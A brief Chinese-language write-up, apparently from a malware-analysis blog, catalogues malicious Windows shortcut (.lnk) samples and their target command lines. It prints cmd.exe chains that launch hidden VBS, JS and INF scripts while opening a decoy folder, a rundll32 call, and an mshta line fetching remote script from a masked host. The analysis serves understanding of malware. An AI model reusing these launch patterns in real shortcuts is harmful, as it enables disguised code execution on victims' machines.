本篇讲常见的lnk样本.
lnk一般都是文件或文件夹的快捷方式,Virus正好利用这点做了劫持,在完成正常启动的过程中利用cmd命令启动vbs,rundll32等
0x1 文件/文件夹快捷方式.
- 在样本上右键–>属性–>快捷方式
- 注:运行方式一般选最小化.
1.1 vbs
C:\WINDOWS\system32\cmd.exe /c start uzgbtymhqo.vbs&start uzgbtymhqo.vbs.vir&exit
C:\Windows\System32\cmd.exe /c cls&start explorer 7z&cls&start 12.16.24.js&cls&exit
1.2 inf
C:\Windows\system32\cmd.exe /c start Mount.vbs&start autorun.inf&exit
1.3 rundll32
%homedrive%\WINDOWS\System32\rundll32.exe _WEWTSGSK.nil,rundll32
1.4 Floder
C:\Windows\system32\cmd.exe /c start Mount.vbs&start explorer 20170109学习&exit
1.5 http
cankao
C:\Windows\system32\mshta.exe
about:<script src='hxxp://neya-***.ru/config.ini'></script>https://mail.ru/ hxxps://google.com / https://yandex.ru"
1.6 picture
0x2 Internet lnk
- 一般用来做网页推广
2.1如何创建
2.2属性及设置快捷键
- 设置好快捷方式其实挺好用的,快速打开blog.